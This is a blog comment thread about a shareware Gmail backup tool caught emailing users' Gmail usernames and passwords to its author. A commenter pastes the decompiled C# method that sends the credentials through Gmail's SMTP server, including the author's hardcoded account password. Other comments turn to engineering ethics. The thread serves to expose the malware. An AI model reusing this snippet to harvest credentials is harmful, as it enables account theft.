This sort of problem is what OAuth is designed to help solve.
Not only can 3rd party websites not truely be trusted with one’s passwords, now that all computers are pretty much online all the time, it’s not safe to trust closed source apps, or even open source apps with uninspected code, with one’s password.
First of all, Dustin Brooks for president. What a hero.
Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)
Dustin Brooks’ sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call “John Terry” and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.
That’s fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don’t think he’d make the cut to be on 24. I mean, this isn’t like an IRC bot where you have to put the hostname to phone home to into the bot… He could have sent email to his account without exposing the password!
Is he really that dense, or is this some kind of weird hoax?
One thing is true – if you DL the program and use reflector, you do indeed see the facts as they are described in this post:
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}Very interesting Jeff. Btw, here in British Columbia, Canada, Software Engineers can be registered as Professional Engineers that adhere to this code of ethics:
http://www.apeg.bc.ca/resource/publications/actbylawscode.html
Interestingly enough, as a professional software engineer, you can be held legally responsible for the designs and codes you write. I wonder what our profession (vocation? craft?) would look like if we were all held legally responsible for our work?
Patrick wrote :
That’s fishy. Why would jterry need to include his u/p in the program?
Because GMail requires authentication to use their SMTP server.
Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail’s IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.
Just about any other mail client with IMAP support should also work.
Jeff’s usually really awesome about linking to sources.
Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin’s name in bold.
And yes, Dustin is the hero here, not me. I’m just reporting it.
Look everyone, I don’t mean to be bursting everyones bubble but I’m not finding this in the source code anywhere. While this is my first time using reflector, I’m not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com"
Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than “hey look what I found.”
Ryan wrote :
I’m not finding this in the source code anywhere
The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.
Patrick copy / pasted the code accurately.
What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I’m just curious as to where you would draw the line.
This was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:
I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn’t have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happly surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.
There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.
Wow! That’s all I can say. I wonder how many gmail accounts he’s harvested. Like someone said, maybe this should be reported to the police. Since google accounts can be linked to financial information (via google checkout), this could be considered theft.
Jeff,
Great detective work.
I don’t know if you’ve ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).
In response to Travis, some engineers reportedly quit the company that makes the space shuttle’s robotic arm, because of a proposed takeover by a U.S. arms maker.
What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I’m just curious as to where you would draw the line.
That’s always been the big problem. It’s not unique to computer science at all. One could say it started with the physicists “knowing sin” but in reality you can trace it back a lot farther.
But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they’re not the ones harming others – that’s what the military does, what politicians do. Oh, they’re not the ones not contributing to society – they just make the tools. Same old story.
My oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much we trust we place in the authors.
This time round you had the source code, what about apps that we don’t?
Yeah, it’s bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
You don’t have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.
Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.
Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.
With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.
Didn’t Dustin email all the affected users to warn them to change their passwords?
I have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claim it is illegal to rip a CD you purchased for your computer or MP3 player.)
In order to behave in a fair way, I should be allowed to break copyright. But then, I’d be breaking copyright.